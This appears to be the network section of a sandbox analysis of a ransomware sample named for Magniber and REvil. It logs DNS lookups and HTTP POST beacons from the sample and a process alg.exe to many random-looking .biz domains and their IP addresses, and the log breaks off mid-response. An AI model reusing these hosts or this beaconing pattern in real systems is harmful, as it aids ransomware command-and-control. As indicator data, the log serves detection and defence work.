jifai.biz

IN A

Response

jifai.biz

IN A

44.221.84.105
POST

http://zgapiej.biz/ccspwqmywoldks

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.208.156.248:80

Request

POST /ccspwqmywoldks HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zgapiej.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8f6799e36d24eaded05ea3bb7df8b349|191.101.209.39|1719160463|1719160463|0|1|0; path=/; domain=.zgapiej.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://jifai.biz/nutsmrvwfuvgeud

alg.exe

Remote address:

44.221.84.105:80

Request

POST /nutsmrvwfuvgeud HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jifai.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0a7bb664a78dde21ce87491fed53ca01|191.101.209.39|1719160463|1719160463|0|1|0; path=/; domain=.jifai.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jifai.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

jifai.biz

IN A

Response

jifai.biz

IN A

44.221.84.105
POST

http://jifai.biz/shmsxqimqw

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.221.84.105:80

Request

POST /shmsxqimqw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jifai.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1201acda98d971952015f0a662639174|191.101.209.39|1719160463|1719160463|0|1|0; path=/; domain=.jifai.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://xnxvnn.biz/ge

alg.exe

Remote address:

13.251.16.150:80

Request

POST /ge HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xnxvnn.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0ab551fc7b0ce7fe6dfc3ff9ba3535f3|191.101.209.39|1719160464|1719160464|0|1|0; path=/; domain=.xnxvnn.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

xnxvnn.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

xnxvnn.biz

IN A

Response

xnxvnn.biz

IN A

13.251.16.150
POST

http://xnxvnn.biz/ctgwyj

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

13.251.16.150:80

Request

POST /ctgwyj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xnxvnn.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d0a04128b9a2634c47604623b2d6a0b2|191.101.209.39|1719160464|1719160464|0|1|0; path=/; domain=.xnxvnn.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ihcnogskt.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

ihcnogskt.biz

IN A

Response

ihcnogskt.biz

IN A

35.164.78.200
POST

http://ihcnogskt.biz/rkpia

alg.exe

Remote address:

35.164.78.200:80

Request

POST /rkpia HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ihcnogskt.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e3a26a96cb7f034c63d99fdb32833976|191.101.209.39|1719160465|1719160465|0|1|0; path=/; domain=.ihcnogskt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ihcnogskt.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

ihcnogskt.biz

IN A

Response

ihcnogskt.biz

IN A

35.164.78.200
POST

http://ihcnogskt.biz/mjxd

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

35.164.78.200:80

Request

POST /mjxd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ihcnogskt.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=89c03bc9da44d43725670413e0c0b95b|191.101.209.39|1719160465|1719160465|0|1|0; path=/; domain=.ihcnogskt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

kkqypycm.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

kkqypycm.biz

IN A

Response

kkqypycm.biz

IN A

18.141.10.107
POST

http://kkqypycm.biz/eufmrrrekpipkje

alg.exe

Remote address:

18.141.10.107:80

Request

POST /eufmrrrekpipkje HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: kkqypycm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b7d6f92a7c2ef00ea75c1667e953539d|191.101.209.39|1719160466|1719160466|0|1|0; path=/; domain=.kkqypycm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

kkqypycm.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

kkqypycm.biz

IN A

Response

kkqypycm.biz

IN A

18.141.10.107
POST

http://kkqypycm.biz/vfm

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.141.10.107:80

Request

POST /vfm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: kkqypycm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b0c949f1b2da26e1700cb0b6e13a992a|191.101.209.39|1719160466|1719160466|0|1|0; path=/; domain=.kkqypycm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

uevrpr.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

uevrpr.biz

IN A

Response

uevrpr.biz

IN A

44.213.104.86
POST

http://uevrpr.biz/upuvg

alg.exe

Remote address:

44.213.104.86:80

Request

POST /upuvg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uevrpr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7272bf41d0c657e2e23299714f728fa7|191.101.209.39|1719160466|1719160466|0|1|0; path=/; domain=.uevrpr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

fgajqjyhr.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

fgajqjyhr.biz

IN A

Response

fgajqjyhr.biz

IN A

34.211.97.45
DNS

uevrpr.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

uevrpr.biz

IN A

Response

uevrpr.biz

IN A

44.213.104.86
POST

http://uevrpr.biz/wo

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.213.104.86:80

Request

POST /wo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uevrpr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f3c95f9b74606a2f0ac94952ad26fc71|191.101.209.39|1719160466|1719160466|0|1|0; path=/; domain=.uevrpr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://fgajqjyhr.biz/tccefxficfxfjppi

alg.exe

Remote address:

34.211.97.45:80

Request

POST /tccefxficfxfjppi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fgajqjyhr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=db7ae8ff676c1c469e3784650560e17e|191.101.209.39|1719160467|1719160467|0|1|0; path=/; domain=.fgajqjyhr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

fgajqjyhr.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

fgajqjyhr.biz

IN A

Response

fgajqjyhr.biz

IN A

34.211.97.45
POST

http://fgajqjyhr.biz/ohxfurcbetqlb

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

34.211.97.45:80

Request

POST /ohxfurcbetqlb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fgajqjyhr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fd1f87e76a37ba5ab297ae04b7932daf|191.101.209.39|1719160467|1719160467|0|1|0; path=/; domain=.fgajqjyhr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

hagujcj.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

hagujcj.biz

IN A

Response

hagujcj.biz

IN A

18.208.156.248
POST

http://hagujcj.biz/pcobnwegildnpu

alg.exe

Remote address:

18.208.156.248:80

Request

POST /pcobnwegildnpu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hagujcj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6691e231caa83ae6d75c6f231d4595d0|191.101.209.39|1719160467|1719160467|0|1|0; path=/; domain=.hagujcj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

sctmku.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

sctmku.biz

IN A

Response

sctmku.biz

IN A

35.164.78.200
DNS

hagujcj.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

hagujcj.biz

IN A

Response

hagujcj.biz

IN A

18.208.156.248
DNS

sewlqwcd.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

sewlqwcd.biz

IN A

Response

sewlqwcd.biz

IN A

44.221.84.105
POST

http://sctmku.biz/ghjfopatdt

alg.exe

Remote address:

35.164.78.200:80

Request

POST /ghjfopatdt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sctmku.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=34c7c0726d722189727843a334b88cfe|191.101.209.39|1719160467|1719160467|0|1|0; path=/; domain=.sctmku.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://hagujcj.biz/rikbejjrlac

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.208.156.248:80

Request

POST /rikbejjrlac HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hagujcj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b642bc046c97626bb6fdcb0d122b101d|191.101.209.39|1719160467|1719160467|0|1|0; path=/; domain=.hagujcj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

sctmku.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

sctmku.biz

IN A

Response

sctmku.biz

IN A

35.164.78.200
POST

http://sctmku.biz/jtrqcd

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

35.164.78.200:80

Request

POST /jtrqcd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sctmku.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9e04e5ecfbe7376a90e5b7442f24cdf3|191.101.209.39|1719160468|1719160468|0|1|0; path=/; domain=.sctmku.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

cwyfknmwh.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

cwyfknmwh.biz

IN A

Response
DNS

qcrsp.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

qcrsp.biz

IN A

Response

qcrsp.biz

IN A

34.211.97.45
POST

http://qcrsp.biz/eqnxdopgjhlbk

alg.exe

Remote address:

34.211.97.45:80

Request

POST /eqnxdopgjhlbk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qcrsp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8c2c05489772b14513587042b59a706a|191.101.209.39|1719160468|1719160468|0|1|0; path=/; domain=.qcrsp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

cwyfknmwh.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

cwyfknmwh.biz

IN A

Response
DNS

qcrsp.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

qcrsp.biz

IN A

Response

qcrsp.biz

IN A

34.211.97.45
POST

http://qcrsp.biz/grrytwjnimqg

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

34.211.97.45:80

Request

POST /grrytwjnimqg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qcrsp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=082585ca2be46edc602945975b9e5d24|191.101.209.39|1719160468|1719160468|0|1|0; path=/; domain=.qcrsp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

sewlqwcd.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

sewlqwcd.biz

IN A

Response

sewlqwcd.biz

IN A

44.221.84.105
POST

http://sewlqwcd.biz/arsumnpwpn

alg.exe

Remote address:

44.221.84.105:80

Request

POST /arsumnpwpn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sewlqwcd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1a3e70f4be22fbe9f6869572ca796e07|191.101.209.39|1719160468|1719160468|0|1|0; path=/; domain=.sewlqwcd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

dyjdrp.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

dyjdrp.biz

IN A

Response

dyjdrp.biz

IN A

54.244.188.177
POST

http://dyjdrp.biz/qenqmg

alg.exe

Remote address:

54.244.188.177:80

Request

POST /qenqmg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dyjdrp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=799a20860e429b6344ada5dc9a0835fd|191.101.209.39|1719160469|1719160469|0|1|0; path=/; domain=.dyjdrp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://sewlqwcd.biz/iswvcoqkw

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.221.84.105:80

Request

POST /iswvcoqkw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sewlqwcd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d9368130e84410de57a643d60e8e37bf|191.101.209.39|1719160468|1719160468|0|1|0; path=/; domain=.sewlqwcd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

dyjdrp.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

dyjdrp.biz

IN A

Response

dyjdrp.biz

IN A

54.244.188.177
POST

http://dyjdrp.biz/afee

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

54.244.188.177:80

Request

POST /afee HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dyjdrp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=15e17e7415825146d855796fe57f41d4|191.101.209.39|1719160469|1719160469|0|1|0; path=/; domain=.dyjdrp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

napws.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

napws.biz

IN A

Response

napws.biz

IN A

35.164.78.200
POST

http://napws.biz/etpgflry

alg.exe

Remote address:

35.164.78.200:80

Request

POST /etpgflry HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: napws.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:29 GMT
Content-Type: text/html
